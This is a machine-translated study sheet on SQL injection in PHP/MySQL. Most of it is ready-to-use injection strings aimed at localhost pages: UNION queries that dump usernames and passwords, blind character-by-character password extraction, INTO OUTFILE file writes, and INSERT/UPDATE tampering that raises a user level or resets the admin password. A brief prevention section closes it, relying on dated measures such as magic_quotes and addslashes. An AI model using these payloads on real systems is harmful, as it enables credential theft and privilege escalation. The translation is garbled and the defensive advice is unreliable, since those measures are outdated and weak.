SQL injection focuses on the construction of SQL statements, only the flexible use of SQL
Statement to construct the injected string of the bull ratio. After finishing the study, I wrote some notes, ready to use. I hope you're looking at the following.
The rationale for solving SQL. The code in the note comes from the network.
= = = Basic Part = = =
This table inquires:
Http://127.0.0.1/injection/user.php?username=angel ' and LENGTH (password) = ' 6
Http://127.0.0.1/injection/user.php?username=angel ' and Left (password,1) = ' m
Union UNION statement:
Http://127.0.0.1/injection/show.php?id=1 ' Union select 1,username,password from user/*
Http://127.0.0.1/injection/show.php?id= ' Union select 1,username,password from user/*
Export File:
Http://127.0.0.1/injection/user.php?username=angel ' into outfile ' c:/file.txt
Http://127.0.0.1/injection/user.php?username= ' or 1=1 into outfile ' C:/file.txt
Http://127.0.0.1/injection/show.php?id= ' Union select 1,username,password from user to outfile ' c:/user.txt
Insert statement:
INSERT into ' user ' (userid, username, password, homepage, userlevel) VALUES (' ', ' $username ', ' $password ', ' $homepage ', ' 1 ');
Construct Homepage Value: Http://4ngel.net ', ' 3 ') #
The SQL statement becomes: INSERT into ' user ' (userid, username, password, homepage, userlevel) VALUES (' ', ' Angel ', ' mypass ', ' Http://4ngel '). Net ', ' 3 ') # ', ' 1 ');
UPDATE statement: I like such a thing.
First understand this SQL
UPDATE user SET password= ' MD5 ($password) ', homepage= ' $homepage ' WHERE
If this SQL is modified to the following form, an injection is implemented
1: Modify the homepage value to
Http://4ngel.net ', userlevel= ' 3
The SQL statement then changes to
UPDATE user SET password= ' mypass ', homepage= ' http://4ngel.net ', userlevel= ' 3 ' WHERE
Userlevel for User Level
2: Modify the password value to
Mypass) ' WHERE username= ' admin ' #
The SQL statement then changes to
UPDATE user SET password= ' MD5 (mypass) ' where username= ' admin ' #) ', homepage= ' $homepage ' where
3: Modify the ID value to
' OR username= ' admin '
The SQL statement then changes to
UPDATE user SET password= ' MD5 ($password) ', homepage= ' $homepage ' WHERE OR username= ' admin '
= = = Advanced Part = = =
Common MySQL built-in functions
DATABASE ()
USER ()
System_user ()
Session_user ()
Current_User ()
Database ()
Version ()
SUBSTRING ()
MID ()
CHAR ()
Load_file ()
......
function application
UPDATE article SET title=database () WHERE id=1
Http://127.0.0.1/injection/show.php?id=-1 Union Select 1,database (), version ()
SELECT * from user WHERE Username=char (97,110,103,101,108)
# char (97,110,103,101,108) equals Angel, Decimal
Http://127.0.0.1/injection/user.php?userid=1 and Password=char (109,121,112,97,115,115) http://127.0.0.1/injection /user.php?userid=1 and Left (password,1) >char (100)
Http://127.0.0.1/injection/user.php?userid=1 and Ord (Mid (password,3,1)) >111
Determine the number and type of fields in a data structure
Http://127.0.0.1/injection/show.php?id=-1 Union Select 1,1,1
Http://127.0.0.1/injection/show.php?id=-1 Union Select char ($), char (97)
Guess the name of the data table
Http://127.0.0.1/injection/show.php?id=-1 Union Select 1,1,1 from
Cross-table queries get user name and password
http://127.0.0.1/ymdown/show.php?id=10000 Union Select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1
Other
#验证第一位密码
HTTP://127.0.0.1/YMDOWN/SHOW.PHP?ID=10 Union Select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1 and Ord (Mid (password,1,1)) =49
= = = Injection Prevention = = =
Server aspects
MAGIC_QUOTES_GPC set to On
Display_errors set to Off
Coding aspects
$keywords = Addslashes ($keywords);
$keywords = Str_replace ("_", "\_", $keywords);
$keywords = str_replace ("%", "\%", $keywords);
Numeric type
Use Intval () to catch a change
String type
Add single quotation marks to the SQL statement parameter
The following code is used to prevent injection
if (GET_MAGIC_QUOTES_GPC ()) {
//....
}else{
$str = mysql_real_escape_string ($STR);
$keywords = Str_replace ("_", "\_", $keywords);
$keywords = str_replace ("%", "\%", $keywords);
}
Useful functions
Stripslashes ()
GET_MAGIC_QUOTES_GPC ()
Mysql_real_escape_string ()
Strip_tags ()
Array_map ()
Addslashes ()
Reference article:
Http://www.4ngel.net/article/36.htm (SQL injection with MySQL) Chinese
http://www.phpe.net/mysql_manual/06-4.html (MySQL statement reference)
The above describes SQL injection PHP SQL injection Implementation Test code security good, including the content of SQL injection, I hope the PHP tutorial interested in a friend helpful.